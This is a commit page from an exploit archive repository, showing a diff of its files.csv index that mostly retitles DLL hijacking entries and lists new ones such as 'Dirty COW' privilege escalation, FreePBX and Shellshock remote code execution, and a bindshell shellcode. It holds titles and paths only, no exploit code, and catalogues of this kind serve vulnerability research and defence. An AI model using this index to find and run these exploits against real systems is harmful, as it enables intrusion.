DB: 2016-10-22

7 new exploits

RealSecure / Blackice - iss_pam1.dll Remote Overflow
RealSecure / Blackice - 'iss_pam1.dll' Remote Overflow

Wireshark 1.2.10 - (airpcap.dll) DLL Hijacking Exploit
Wireshark 1.2.10 - 'airpcap.dll' DLL Hijacking

Microsoft Power Point 2010 - 'pptimpconv.dll' DLL Hijacking Exploit
Microsoft Power Point 2010 - 'pptimpconv.dll' DLL Hijacking
uTorrent 2.0.3 - (plugin_dll.dll) DLL Hijacking Exploit
Microsoft Windows Live Email - 'dwmapi.dll' DLL Hijacking Exploit
uTorrent 2.0.3 - 'plugin_dll.dll' DLL Hijacking
Microsoft Windows Live Email - 'dwmapi.dll' DLL Hijacking
Mozilla Firefox 3.6.8 - (dwmapi.dll) DLL Hijacking Exploit
Microsoft Windows Movie Maker 2.6.4038.0 - (hhctrl.ocx) DLL Hijacking Exploit
Opera 10.61 - DLL Hijacking Exploit (dwmapi.dll)
Microsoft Windows 7 - wab.exe DLL Hijacking Exploit (wab32res.dll)
TeamViewer 5.0.8703 - (dwmapi.dll) DLL Hijacking Exploit
Adobe Dreamweaver CS4 - 'ibfs32.dll' DLL Hijacking Exploit
Microsoft Visio 2003 - 'mfc71enu.dll' DLL Hijacking Exploit
Microsoft Address Book 6.00.2900.5512 - (wab32res.dll) DLL Hijacking Exploit
Microsoft Office Groove 2007 - 'mso.dll' DLL Hijacking Exploit
TeamMate Audit Management Software Suite - 'mfc71enu.dll' DLL Hijacking Exploit
Mozilla Firefox 3.6.8 - 'dwmapi.dll' DLL Hijacking
Microsoft Windows Movie Maker 2.6.4038.0 - 'hhctrl.ocx' DLL Hijacking
Opera 10.61 - 'dwmapi.dll' DLL Hijacking
Microsoft Windows 7 - 'wab32res.dll' wab.exe DLL
TeamViewer 5.0.8703 - 'dwmapi.dll' DLL Hijacking
Adobe Dreamweaver CS4 - 'ibfs32.dll' DLL Hijacking
Microsoft Visio 2003 - 'mfc71enu.dll' DLL Hijacking
Microsoft Address Book 6.00.2900.5512 - 'wab32res.dll' DLL Hijacking
Microsoft Office Groove 2007 - 'mso.dll' DLL Hijacking
TeamMate Audit Management Software Suite - 'mfc71enu.dll' DLL Hijacking
BS.Player 2.56 build 1043 - (mfc71loc.dll) DLL Hijacking Exploit
Adobe Dreamweaver CS5 11.0 build 4909 - DLL Hijacking Exploit (mfc90loc.dll)
Adobe Photoshop CS2 - 'Wintab32.dll' DLL Hijacking Exploit
BS.Player 2.56 build 1043 - 'mfc71loc.dll' DLL Hijacking
Adobe Dreamweaver CS5 11.0 build 4909 - 'mfc90loc.dll' DLL Hijacking
Adobe Photoshop CS2 - 'Wintab32.dll' DLL Hijacking

Avast! 5.0.594 - (mfc90loc.dll) License Files DLL Hijacking Exploit
Avast! 5.0.594 - 'mfc90loc.dll' License Files DLL Hijacking

VideoLAN VLC Media Player - 'wintab32.dll' DLL Hijacking Exploit
VideoLAN VLC Media Player - 'wintab32.dll' DLL Hijacking
Roxio Photosuite 9 - 'homeutils9.dll' DLL Hijacking Exploit
Safari 5.0.1 - DLL Hijacking Exploit (dwmapi.dll)
InterVideo WinDVD 5 - 'cpqdvd.dll' DLL Hijacking Exploit
Microsoft Internet Connection Signup Wizard - 'smmscrpt.dll' DLL Hijacking Exploit
Adobe Device Central CS5 - 'qtcf.dll' DLL Hijacking Exploit
Ettercap NG-0.7.3 - (wpcap.dll) DLL Hijacking Exploit
Microsoft Group Convertor - 'imm.dll' DLL Hijacking Exploit
Roxio Photosuite 9 - 'homeutils9.dll' DLL Hijacking
Safari 5.0.1 - 'dwmapi.dll' DLL Hijacking
InterVideo WinDVD 5 - 'cpqdvd.dll' DLL Hijacking
Microsoft Internet Connection Signup Wizard - 'smmscrpt.dll' DLL Hijacking
Adobe Device Central CS5 - 'qtcf.dll' DLL Hijacking
Ettercap NG-0.7.3 - 'wpcap.dll' DLL Hijacking
Microsoft Group Convertor - 'imm.dll' DLL Hijacking
TechSmith Snagit 10 (Build 788) - 'dwmapi.dll' DLL Hijacking Exploit
MediaPlayer Classic 1.3.2189.0 - DLL Hijacking Exploit (iacenc.dll)
Skype 4.2.0.169 - (wab32.dll) DLL Hijacking Exploit
TechSmith Snagit 10 (Build 788) - 'dwmapi.dll' DLL Hijacking
MediaPlayer Classic 1.3.2189.0 - 'iacenc.dll' DLL Hijacking
Skype 4.2.0.169 - 'wab32.dll' DLL Hijacking
Roxio Creator DE - 'HomeUtils9.dll' DLL Hijacking Exploit
Nvidia Driver - DLL Hijacking Exploit (nview.dll)
Adobe Premier Pro CS4 - 'ibfs32.dll' DLL Hijacking Exploit
Adobe On Location CS4 - 'ibfs32.dll' DLL Hijacking Exploit
Adobe Illustrator CS4 - 'aires.dll' DLL Hijacking Exploit
Cisco Packet Tracer 5.2 - (wintab32.dll) DLL Hijacking Exploit
Adobe InDesign CS4 - 'ibfs32.dll' DLL Hijacking Exploit
Roxio Creator DE - 'HomeUtils9.dll' DLL Hijacking
Nvidia Driver - 'nview.dll' DLL Hijacking
Adobe Premier Pro CS4 - 'ibfs32.dll' DLL Hijacking
Adobe On Location CS4 - 'ibfs32.dll' DLL Hijacking
Adobe Illustrator CS4 - 'aires.dll' DLL Hijacking
Cisco Packet Tracer 5.2 - 'wintab32.dll' DLL Hijacking
Adobe InDesign CS4 - 'ibfs32.dll' DLL Hijacking
Microsoft Windows Contacts - 'wab32res.dll' DLL Hijacking Exploit
Microsoft Windows Internet Communication Settings - 'schannel.dll' DLL Hijacking Exploit
Roxio MyDVD 9 - 'HomeUtils9.dll' DLL Hijacking Exploit
Microsoft PowerPoint 2007 - 'rpawinet.dll' DLL Hijacking Exploit
Mozilla Thunderbird - DLL Hijacking Exploit (dwmapi.dll)
Adobe Extension Manager CS5 5.0.298 - DLL Hijacking Exploit (dwmapi.dll)
Adobe ExtendedScript Toolkit CS5 3.5.0.52 - DLL Hijacking Exploit (dwmapi.dll)
CorelDRAW X3 13.0.0.576 - DLL Hijacking Exploit (crlrib.dll)
Corel PHOTO-PAINT X3 13.0.0.576 - DLL Hijacking Exploit (crlrib.dll)
Media Player Classic 6.4.9.1 - (iacenc.dll) DLL Hijacking Exploit
Nullsoft Winamp 5.581 - DLL Hijacking Exploit (wnaspi32.dll)
Google Earth 5.1.3535.3218 - DLL Hijacking Exploit (quserex.dll)
Daemon Tools Lite - 'mfc80loc.dll' DLL Hijacking Exploit
Microsoft Windows Contacts - 'wab32res.dll' DLL Hijacking
Microsoft Windows Internet Communication Settings - 'schannel.dll' DLL Hijacking
Roxio MyDVD 9 - 'HomeUtils9.dll' DLL Hijacking
Microsoft PowerPoint 2007 - 'rpawinet.dll' DLL Hijacking
Mozilla Thunderbird - 'dwmapi.dll' DLL Hijacking
Adobe Extension Manager CS5 5.0.298 - 'dwmapi.dll' DLL Hijacking
Adobe ExtendedScript Toolkit CS5 3.5.0.52 - 'dwmapi.dll' DLL Hijacking
CorelDRAW X3 13.0.0.576 - 'crlrib.dll' DLL Hijacking
Corel PHOTO-PAINT X3 13.0.0.576 - 'crlrib.dll' DLL Hijacking
Media Player Classic 6.4.9.1 - 'iacenc.dll' DLL Hijacking
Nullsoft Winamp 5.581 - 'wnaspi32.dll' DLL Hijacking
Google Earth 5.1.3535.3218 - 'quserex.dll' DLL Hijacking
Daemon Tools Lite - 'mfc80loc.dll' DLL Hijacking

Autodesk AutoCAD 2007 - 'color.dll' DLL Hijacking Exploit
Autodesk AutoCAD 2007 - 'color.dll' DLL Hijacking

Microsoft Edge - Array.map Heap Overflow (MS16-119)
Microsoft Edge - 'Array.map' Heap Overflow (MS16-119)

Microsoft Edge - Array.join Info Leak (MS16-119)
Microsoft Edge - 'Array.join' Infomation Leak (MS16-119)

Adobe Flash - Transform.colorTranform Getter Info Leak
Adobe Flash - Transform.colorTranform Getter Infomation Leak
Windows DFS Client Driver - Arbitrary Drive Mapping Privilege Escalation (MS16-123)
Windows DeviceApi CMApi - PiCMOpenDeviceKey Arbitrary Registry Key Write Privilege Escalation (MS16-124)
Windows DeviceApi CMApi - User Hive Impersonation Privilege Escalation (MS16-124)
Microsoft Windows - DFS Client Driver Arbitrary Drive Mapping Privilege Escalation (MS16-123)
Microsoft Windows - DeviceApi CMApi PiCMOpenDeviceKey Arbitrary Registry Key Write Privilege Escalation (MS16-124)
Microsoft Windows - DeviceApi CMApi User Hive Impersonation Privilege Escalation (MS16-124)
Windows win32k.sys - TTF Processing RCVT TrueType Instruction Handler Out-of-Bounds Read (MS16-120)
Windows win32k.sys - TTF Processing win32k!sbit_Embolden / win32k!ttfdCloseFontContext Use-After-Free (MS16-120)
Windows Kernel - Registry Hive Loading Negative RtlMoveMemory Size in nt!CmpCheckValueList (MS16-124)
Windows Kernel - Registry Hive Loading Relative Arbitrary Read in nt!RtlValidRelativeSecurityDescriptor (MS16-123)
Microsoft Edge - Function.apply Info Leak (MS16-119)
Microsoft Windows - 'win32k.sys' TTF Processing RCVT TrueType Instruction Handler Out-of-Bounds Read (MS16-120)
Microsoft Windows - 'win32k.sys' TTF Processing win32k!sbit_Embolden / win32k!ttfdCloseFontContext Use-After-Free (MS16-120)
Microsoft Windows Kernel - Registry Hive Loading Negative RtlMoveMemory Size in nt!CmpCheckValueList (MS16-124)
Microsoft Windows Kernel - Registry Hive Loading Relative Arbitrary Read in nt!RtlValidRelativeSecurityDescriptor (MS16-123)
Microsoft Edge - Function.apply Infomation Leak (MS16-119)
Windows Edge/IE - Isolated Private Namespace Insecure DACL Privilege Escalation (MS16-118)
Windows Edge/IE - Isolated Private Namespace Insecure Boundary Descriptor Privilege Escalation (MS16-118)
Microsoft Windows Edge/Internet Explorer - Isolated Private Namespace Insecure DACL Privilege Escalation (MS16-118)
Microsoft Windows Edge/Internet Explorer - Isolated Private Namespace Insecure Boundary Descriptor Privilege Escalation (MS16-118)
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' Race Condition Privilege Escalation (Write Access)
Just Dial Clone Script - SQL Injection
FreePBX 10.13.66 - Remote Command Execution / Privilege Escalation
RealPlayer 18.1.5.705 - '.QCP' Crash (PoC)
Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW' Race Condition Privilege Escalation (SUID)
Oracle VM VirtualBox 4.3.28 - '.ovf' Crash (PoC)
TrendMicro InterScan Web Security Virtual Appliance - Remote Code Execution (Shellshock)
Offensive Security 2016-10-22 05:01:17 +00:00
parent 07fdc778ee
commit 506182d72d
8 changed files with 815 additions and 64 deletions

files.csv (135 changes)

@ -161,7 +161,7 @@ id,file,description,date,author,platform,type,port
165,platforms/windows/remote/165.c,"Ipswitch WS_FTP Server 4.0.2 - ALLO Remote Buffer Overflow",2004-03-23,"Hugh Mann",windows,remote,21
166,platforms/windows/remote/166.pl,"eSignal 7.6 - STREAMQUOTE Remote Buffer Overflow",2004-03-26,VizibleSoft,windows,remote,80
167,platforms/linux/remote/167.c,"Ethereal 0.10.0 < 0.10.2 - IGAP Overflow Remote Root Exploit",2004-03-28,"Abhisek Datta",linux,remote,0
168,platforms/windows/remote/168.c,"RealSecure / Blackice - iss_pam1.dll Remote Overflow",2004-03-28,Sam,windows,remote,0
168,platforms/windows/remote/168.c,"RealSecure / Blackice - 'iss_pam1.dll' Remote Overflow",2004-03-28,Sam,windows,remote,0
169,platforms/hardware/remote/169.pl,"Multiple Cisco Products - Cisco Global Exploiter Tool",2004-03-28,blackangels,hardware,remote,0
170,platforms/multiple/dos/170.c,"Ethereal - EIGRP Dissector TLV_IP_INT Long IP Remote Denial of Service",2004-03-26,"Rémi Denis-Courmont",multiple,dos,0
171,platforms/linux/remote/171.c,"tcpdump - ISAKMP Identification payload Integer Overflow",2004-04-05,Rapid7,linux,remote,0
@ -12896,67 +12896,67 @@ id,file,description,date,author,platform,type,port
14717,platforms/php/webapps/14717.txt,"Link CMS - SQL Injection",2010-08-23,hacker@sr.gov.yu,php,webapps,0
14718,platforms/php/webapps/14718.txt,"Joomla! Component com_zoomportfolio - SQL Injection",2010-08-23,"Chip d3 bi0s",php,webapps,0
14720,platforms/windows/local/14720.rb,"MicroP 0.1.1.1600 - 'mppl' Buffer Overflow",2010-08-23,"James Fitts",windows,local,0
14721,platforms/windows/local/14721.c,"Wireshark 1.2.10 - (airpcap.dll) DLL Hijacking Exploit",2010-08-24,TheLeader,windows,local,0
14721,platforms/windows/local/14721.c,"Wireshark 1.2.10 - 'airpcap.dll' DLL Hijacking",2010-08-24,TheLeader,windows,local,0
14722,platforms/php/webapps/14722.txt,"Joomla! 1.5 - URL Redirecting",2010-08-24,Mr.MLL,php,webapps,0
14723,platforms/windows/local/14723.c,"Microsoft Power Point 2010 - 'pptimpconv.dll' DLL Hijacking Exploit",2010-08-24,TheLeader,windows,local,0
14723,platforms/windows/local/14723.c,"Microsoft Power Point 2010 - 'pptimpconv.dll' DLL Hijacking",2010-08-24,TheLeader,windows,local,0
14727,platforms/hardware/local/14727.py,"Foxit Reader 4.0 - '.pdf' Jailbreak Exploit",2010-08-24,"Jose Miguel Esparza",hardware,local,0
14726,platforms/windows/local/14726.c,"uTorrent 2.0.3 - (plugin_dll.dll) DLL Hijacking Exploit",2010-08-24,TheLeader,windows,local,0
14728,platforms/windows/local/14728.c,"Microsoft Windows Live Email - 'dwmapi.dll' DLL Hijacking Exploit",2010-08-24,"Nicolas Krassas",windows,local,0
14726,platforms/windows/local/14726.c,"uTorrent 2.0.3 - 'plugin_dll.dll' DLL Hijacking",2010-08-24,TheLeader,windows,local,0
14728,platforms/windows/local/14728.c,"Microsoft Windows Live Email - 'dwmapi.dll' DLL Hijacking",2010-08-24,"Nicolas Krassas",windows,local,0
14828,platforms/php/webapps/14828.txt,"XOOPS 2.0.14 - 'article.php' SQL Injection",2010-08-28,[]0iZy5,php,webapps,0
14730,platforms/windows/local/14730.c,"Mozilla Firefox 3.6.8 - (dwmapi.dll) DLL Hijacking Exploit",2010-08-24,"Glafkos Charalambous ",windows,local,0
14731,platforms/windows/local/14731.c,"Microsoft Windows Movie Maker 2.6.4038.0 - (hhctrl.ocx) DLL Hijacking Exploit",2010-08-24,TheLeader,windows,local,0
14732,platforms/windows/local/14732.c,"Opera 10.61 - DLL Hijacking Exploit (dwmapi.dll)",2010-08-24,"Nicolas Krassas",windows,local,0
14733,platforms/windows/local/14733.c,"Microsoft Windows 7 - wab.exe DLL Hijacking Exploit (wab32res.dll)",2010-08-24,TheLeader,windows,local,0
14734,platforms/windows/local/14734.c,"TeamViewer 5.0.8703 - (dwmapi.dll) DLL Hijacking Exploit",2010-08-24,"Glafkos Charalambous ",windows,local,0
14735,platforms/windows/local/14735.c,"Adobe Dreamweaver CS4 - 'ibfs32.dll' DLL Hijacking Exploit",2010-08-24,"Glafkos Charalambous ",windows,local,0
14744,platforms/windows/local/14744.c,"Microsoft Visio 2003 - 'mfc71enu.dll' DLL Hijacking Exploit",2010-08-25,"Beenu Arora",windows,local,0
14745,platforms/windows/local/14745.c,"Microsoft Address Book 6.00.2900.5512 - (wab32res.dll) DLL Hijacking Exploit",2010-08-25,"Beenu Arora",windows,local,0
14746,platforms/windows/local/14746.c,"Microsoft Office Groove 2007 - 'mso.dll' DLL Hijacking Exploit",2010-08-25,"Beenu Arora",windows,local,0
14747,platforms/windows/local/14747.c,"TeamMate Audit Management Software Suite - 'mfc71enu.dll' DLL Hijacking Exploit",2010-08-25,"Beenu Arora",windows,local,0
14730,platforms/windows/local/14730.c,"Mozilla Firefox 3.6.8 - 'dwmapi.dll' DLL Hijacking",2010-08-24,"Glafkos Charalambous ",windows,local,0
14731,platforms/windows/local/14731.c,"Microsoft Windows Movie Maker 2.6.4038.0 - 'hhctrl.ocx' DLL Hijacking",2010-08-24,TheLeader,windows,local,0
14732,platforms/windows/local/14732.c,"Opera 10.61 - 'dwmapi.dll' DLL Hijacking",2010-08-24,"Nicolas Krassas",windows,local,0
14733,platforms/windows/local/14733.c,"Microsoft Windows 7 - 'wab32res.dll' wab.exe DLL",2010-08-24,TheLeader,windows,local,0
14734,platforms/windows/local/14734.c,"TeamViewer 5.0.8703 - 'dwmapi.dll' DLL Hijacking",2010-08-24,"Glafkos Charalambous ",windows,local,0
14735,platforms/windows/local/14735.c,"Adobe Dreamweaver CS4 - 'ibfs32.dll' DLL Hijacking",2010-08-24,"Glafkos Charalambous ",windows,local,0
14744,platforms/windows/local/14744.c,"Microsoft Visio 2003 - 'mfc71enu.dll' DLL Hijacking",2010-08-25,"Beenu Arora",windows,local,0
14745,platforms/windows/local/14745.c,"Microsoft Address Book 6.00.2900.5512 - 'wab32res.dll' DLL Hijacking",2010-08-25,"Beenu Arora",windows,local,0
14746,platforms/windows/local/14746.c,"Microsoft Office Groove 2007 - 'mso.dll' DLL Hijacking",2010-08-25,"Beenu Arora",windows,local,0
14747,platforms/windows/local/14747.c,"TeamMate Audit Management Software Suite - 'mfc71enu.dll' DLL Hijacking",2010-08-25,"Beenu Arora",windows,local,0
14737,platforms/php/webapps/14737.txt,"Simple Forum PHP - Multiple Vulnerabilities",2010-08-25,arnab_s,php,webapps,0
14739,platforms/windows/local/14739.c,"BS.Player 2.56 build 1043 - (mfc71loc.dll) DLL Hijacking Exploit",2010-08-25,diwr,windows,local,0
14740,platforms/windows/local/14740.c,"Adobe Dreamweaver CS5 11.0 build 4909 - DLL Hijacking Exploit (mfc90loc.dll)",2010-08-25,diwr,windows,local,0
14741,platforms/windows/local/14741.c,"Adobe Photoshop CS2 - 'Wintab32.dll' DLL Hijacking Exploit",2010-08-25,storm,windows,local,0
14739,platforms/windows/local/14739.c,"BS.Player 2.56 build 1043 - 'mfc71loc.dll' DLL Hijacking",2010-08-25,diwr,windows,local,0
14740,platforms/windows/local/14740.c,"Adobe Dreamweaver CS5 11.0 build 4909 - 'mfc90loc.dll' DLL Hijacking",2010-08-25,diwr,windows,local,0
14741,platforms/windows/local/14741.c,"Adobe Photoshop CS2 - 'Wintab32.dll' DLL Hijacking",2010-08-25,storm,windows,local,0
14742,platforms/php/webapps/14742.txt,"ClanSphere 2010 - Multiple Vulnerabilities",2010-08-25,Sweet,php,webapps,0
14743,platforms/windows/local/14743.c,"Avast! 5.0.594 - (mfc90loc.dll) License Files DLL Hijacking Exploit",2010-08-25,diwr,windows,local,0
14743,platforms/windows/local/14743.c,"Avast! 5.0.594 - 'mfc90loc.dll' License Files DLL Hijacking",2010-08-25,diwr,windows,local,0
14748,platforms/windows/local/14748.txt,"uTorrent - DLL Hijacking",2010-08-25,Dr_IDE,windows,local,0
14750,platforms/windows/local/14750.txt,"VideoLAN VLC Media Player - 'wintab32.dll' DLL Hijacking Exploit",2010-08-25,Secfence,windows,local,0
14750,platforms/windows/local/14750.txt,"VideoLAN VLC Media Player - 'wintab32.dll' DLL Hijacking",2010-08-25,Secfence,windows,local,0
14751,platforms/windows/local/14751.txt,"Microsoft Vista - (fveapi.dll) BitLocker Drive Encryption API Hijacking Exploit",2010-08-25,"Beenu Arora",windows,local,0
14752,platforms/windows/local/14752.c,"Roxio Photosuite 9 - 'homeutils9.dll' DLL Hijacking Exploit",2010-08-25,"Beenu Arora",windows,local,0
14756,platforms/windows/local/14756.c,"Safari 5.0.1 - DLL Hijacking Exploit (dwmapi.dll)",2010-08-25,Secfence,windows,local,0
14753,platforms/windows/local/14753.c,"InterVideo WinDVD 5 - 'cpqdvd.dll' DLL Hijacking Exploit",2010-08-25,"Beenu Arora",windows,local,0
14754,platforms/windows/local/14754.txt,"Microsoft Internet Connection Signup Wizard - 'smmscrpt.dll' DLL Hijacking Exploit",2010-08-25,"Beenu Arora",windows,local,0
14755,platforms/windows/local/14755.c,"Adobe Device Central CS5 - 'qtcf.dll' DLL Hijacking Exploit",2010-08-25,"Glafkos Charalambous ",windows,local,0
14762,platforms/windows/local/14762.c,"Ettercap NG-0.7.3 - (wpcap.dll) DLL Hijacking Exploit",2010-08-25,anonymous,windows,local,0
14758,platforms/windows/local/14758.c,"Microsoft Group Convertor - 'imm.dll' DLL Hijacking Exploit",2010-08-25,"Beenu Arora",windows,local,0
14752,platforms/windows/local/14752.c,"Roxio Photosuite 9 - 'homeutils9.dll' DLL Hijacking",2010-08-25,"Beenu Arora",windows,local,0
14756,platforms/windows/local/14756.c,"Safari 5.0.1 - 'dwmapi.dll' DLL Hijacking",2010-08-25,Secfence,windows,local,0
14753,platforms/windows/local/14753.c,"InterVideo WinDVD 5 - 'cpqdvd.dll' DLL Hijacking",2010-08-25,"Beenu Arora",windows,local,0
14754,platforms/windows/local/14754.txt,"Microsoft Internet Connection Signup Wizard - 'smmscrpt.dll' DLL Hijacking",2010-08-25,"Beenu Arora",windows,local,0
14755,platforms/windows/local/14755.c,"Adobe Device Central CS5 - 'qtcf.dll' DLL Hijacking",2010-08-25,"Glafkos Charalambous ",windows,local,0
14762,platforms/windows/local/14762.c,"Ettercap NG-0.7.3 - 'wpcap.dll' DLL Hijacking",2010-08-25,anonymous,windows,local,0
14758,platforms/windows/local/14758.c,"Microsoft Group Convertor - 'imm.dll' DLL Hijacking",2010-08-25,"Beenu Arora",windows,local,0
14761,platforms/multiple/dos/14761.txt,"Adobe Acrobat Reader < 9.x - Memory Corruption",2010-08-25,ITSecTeam,multiple,dos,0
14764,platforms/windows/local/14764.c,"TechSmith Snagit 10 (Build 788) - 'dwmapi.dll' DLL Hijacking Exploit",2010-08-25,"Encrypt3d.M!nd ",windows,local,0
14765,platforms/windows/local/14765.c,"MediaPlayer Classic 1.3.2189.0 - DLL Hijacking Exploit (iacenc.dll)",2010-08-25,"Encrypt3d.M!nd ",windows,local,0
14766,platforms/windows/local/14766.c,"Skype 4.2.0.169 - (wab32.dll) DLL Hijacking Exploit",2010-08-25,"Glafkos Charalambous ",windows,local,0
14764,platforms/windows/local/14764.c,"TechSmith Snagit 10 (Build 788) - 'dwmapi.dll' DLL Hijacking",2010-08-25,"Encrypt3d.M!nd ",windows,local,0
14765,platforms/windows/local/14765.c,"MediaPlayer Classic 1.3.2189.0 - 'iacenc.dll' DLL Hijacking",2010-08-25,"Encrypt3d.M!nd ",windows,local,0
14766,platforms/windows/local/14766.c,"Skype 4.2.0.169 - 'wab32.dll' DLL Hijacking",2010-08-25,"Glafkos Charalambous ",windows,local,0
14767,platforms/windows/dos/14767.txt,"Flash Movie Player 1.5 - File Magic Denial of Service",2010-08-25,"Matthew Bergin",windows,dos,0
14768,platforms/windows/local/14768.c,"Roxio Creator DE - 'HomeUtils9.dll' DLL Hijacking Exploit",2010-08-25,storm,windows,local,0
14769,platforms/windows/local/14769.c,"Nvidia Driver - DLL Hijacking Exploit (nview.dll)",2010-08-25,"Encrypt3d.M!nd ",windows,local,0
14771,platforms/windows/local/14771.c,"Adobe Premier Pro CS4 - 'ibfs32.dll' DLL Hijacking Exploit",2010-08-25,"Glafkos Charalambous ",windows,local,0
14772,platforms/windows/local/14772.c,"Adobe On Location CS4 - 'ibfs32.dll' DLL Hijacking Exploit",2010-08-25,"Glafkos Charalambous ",windows,local,0
14773,platforms/windows/local/14773.c,"Adobe Illustrator CS4 - 'aires.dll' DLL Hijacking Exploit",2010-08-25,"Glafkos Charalambous ",windows,local,0
14774,platforms/windows/local/14774.c,"Cisco Packet Tracer 5.2 - (wintab32.dll) DLL Hijacking Exploit",2010-08-25,CCNA,windows,local,0
14775,platforms/windows/local/14775.c,"Adobe InDesign CS4 - 'ibfs32.dll' DLL Hijacking Exploit",2010-08-25,"Glafkos Charalambous ",windows,local,0
14768,platforms/windows/local/14768.c,"Roxio Creator DE - 'HomeUtils9.dll' DLL Hijacking",2010-08-25,storm,windows,local,0
14769,platforms/windows/local/14769.c,"Nvidia Driver - 'nview.dll' DLL Hijacking",2010-08-25,"Encrypt3d.M!nd ",windows,local,0
14771,platforms/windows/local/14771.c,"Adobe Premier Pro CS4 - 'ibfs32.dll' DLL Hijacking",2010-08-25,"Glafkos Charalambous ",windows,local,0
14772,platforms/windows/local/14772.c,"Adobe On Location CS4 - 'ibfs32.dll' DLL Hijacking",2010-08-25,"Glafkos Charalambous ",windows,local,0
14773,platforms/windows/local/14773.c,"Adobe Illustrator CS4 - 'aires.dll' DLL Hijacking",2010-08-25,"Glafkos Charalambous ",windows,local,0
14774,platforms/windows/local/14774.c,"Cisco Packet Tracer 5.2 - 'wintab32.dll' DLL Hijacking",2010-08-25,CCNA,windows,local,0
14775,platforms/windows/local/14775.c,"Adobe InDesign CS4 - 'ibfs32.dll' DLL Hijacking",2010-08-25,"Glafkos Charalambous ",windows,local,0
14779,platforms/windows/remote/14779.pl,"Deepin TFTP Server 1.25 - Directory Traversal",2010-08-25,demonalex,windows,remote,0
14778,platforms/windows/local/14778.c,"Microsoft Windows Contacts - 'wab32res.dll' DLL Hijacking Exploit",2010-08-25,storm,windows,local,0
14780,platforms/windows/local/14780.c,"Microsoft Windows Internet Communication Settings - 'schannel.dll' DLL Hijacking Exploit",2010-08-25,ALPdaemon,windows,local,0
14781,platforms/windows/local/14781.c,"Roxio MyDVD 9 - 'HomeUtils9.dll' DLL Hijacking Exploit",2010-08-25,storm,windows,local,0
14782,platforms/windows/local/14782.c,"Microsoft PowerPoint 2007 - 'rpawinet.dll' DLL Hijacking Exploit",2010-08-25,storm,windows,local,0
14783,platforms/windows/local/14783.c,"Mozilla Thunderbird - DLL Hijacking Exploit (dwmapi.dll)",2010-08-25,h4ck3r#47,windows,local,0
14784,platforms/windows/local/14784.c,"Adobe Extension Manager CS5 5.0.298 - DLL Hijacking Exploit (dwmapi.dll)",2010-08-25,LiquidWorm,windows,local,0
14785,platforms/windows/local/14785.c,"Adobe ExtendedScript Toolkit CS5 3.5.0.52 - DLL Hijacking Exploit (dwmapi.dll)",2010-08-25,LiquidWorm,windows,local,0
14786,platforms/windows/local/14786.c,"CorelDRAW X3 13.0.0.576 - DLL Hijacking Exploit (crlrib.dll)",2010-08-25,LiquidWorm,windows,local,0
14787,platforms/windows/local/14787.c,"Corel PHOTO-PAINT X3 13.0.0.576 - DLL Hijacking Exploit (crlrib.dll)",2010-08-25,LiquidWorm,windows,local,0
14788,platforms/windows/local/14788.c,"Media Player Classic 6.4.9.1 - (iacenc.dll) DLL Hijacking Exploit",2010-08-25,LiquidWorm,windows,local,0
14789,platforms/windows/local/14789.c,"Nullsoft Winamp 5.581 - DLL Hijacking Exploit (wnaspi32.dll)",2010-08-25,LiquidWorm,windows,local,0
14790,platforms/windows/local/14790.c,"Google Earth 5.1.3535.3218 - DLL Hijacking Exploit (quserex.dll)",2010-08-25,LiquidWorm,windows,local,0
14791,platforms/windows/local/14791.c,"Daemon Tools Lite - 'mfc80loc.dll' DLL Hijacking Exploit",2010-08-25,"Mohamed Clay",windows,local,0
14778,platforms/windows/local/14778.c,"Microsoft Windows Contacts - 'wab32res.dll' DLL Hijacking",2010-08-25,storm,windows,local,0
14780,platforms/windows/local/14780.c,"Microsoft Windows Internet Communication Settings - 'schannel.dll' DLL Hijacking",2010-08-25,ALPdaemon,windows,local,0
14781,platforms/windows/local/14781.c,"Roxio MyDVD 9 - 'HomeUtils9.dll' DLL Hijacking",2010-08-25,storm,windows,local,0
14782,platforms/windows/local/14782.c,"Microsoft PowerPoint 2007 - 'rpawinet.dll' DLL Hijacking",2010-08-25,storm,windows,local,0
14783,platforms/windows/local/14783.c,"Mozilla Thunderbird - 'dwmapi.dll' DLL Hijacking",2010-08-25,h4ck3r#47,windows,local,0
14784,platforms/windows/local/14784.c,"Adobe Extension Manager CS5 5.0.298 - 'dwmapi.dll' DLL Hijacking",2010-08-25,LiquidWorm,windows,local,0
14785,platforms/windows/local/14785.c,"Adobe ExtendedScript Toolkit CS5 3.5.0.52 - 'dwmapi.dll' DLL Hijacking",2010-08-25,LiquidWorm,windows,local,0
14786,platforms/windows/local/14786.c,"CorelDRAW X3 13.0.0.576 - 'crlrib.dll' DLL Hijacking",2010-08-25,LiquidWorm,windows,local,0
14787,platforms/windows/local/14787.c,"Corel PHOTO-PAINT X3 13.0.0.576 - 'crlrib.dll' DLL Hijacking",2010-08-25,LiquidWorm,windows,local,0
14788,platforms/windows/local/14788.c,"Media Player Classic 6.4.9.1 - 'iacenc.dll' DLL Hijacking",2010-08-25,LiquidWorm,windows,local,0
14789,platforms/windows/local/14789.c,"Nullsoft Winamp 5.581 - 'wnaspi32.dll' DLL Hijacking",2010-08-25,LiquidWorm,windows,local,0
14790,platforms/windows/local/14790.c,"Google Earth 5.1.3535.3218 - 'quserex.dll' DLL Hijacking",2010-08-25,LiquidWorm,windows,local,0
14791,platforms/windows/local/14791.c,"Daemon Tools Lite - 'mfc80loc.dll' DLL Hijacking",2010-08-25,"Mohamed Clay",windows,local,0
14818,platforms/linux/remote/14818.pl,"McAfee LinuxShield 1.5.1 - Local/Remote File Inclusion (Root Remote Code Execution)",2010-08-27,"Nikolas Sotiriu",linux,remote,0
14793,platforms/windows/local/14793.c,"Autodesk AutoCAD 2007 - 'color.dll' DLL Hijacking Exploit",2010-08-25,"xsploited security",windows,local,0
14793,platforms/windows/local/14793.c,"Autodesk AutoCAD 2007 - 'color.dll' DLL Hijacking",2010-08-25,"xsploited security",windows,local,0
14817,platforms/php/webapps/14817.txt,"Esvon Classifieds 4.0 - Multiple Vulnerabilities",2010-08-27,Sn!pEr.S!Te,php,webapps,0
14795,platforms/bsd_x86/shellcode/14795.c,"BSD/x86 - bindshell on port 2525 Shellcode (167 bytes)",2010-08-25,beosroot,bsd_x86,shellcode,0
14806,platforms/php/webapps/14806.txt,"Prometeo 1.0.65 - SQL Injection",2010-08-26,"Lord Tittis3000",php,webapps,0
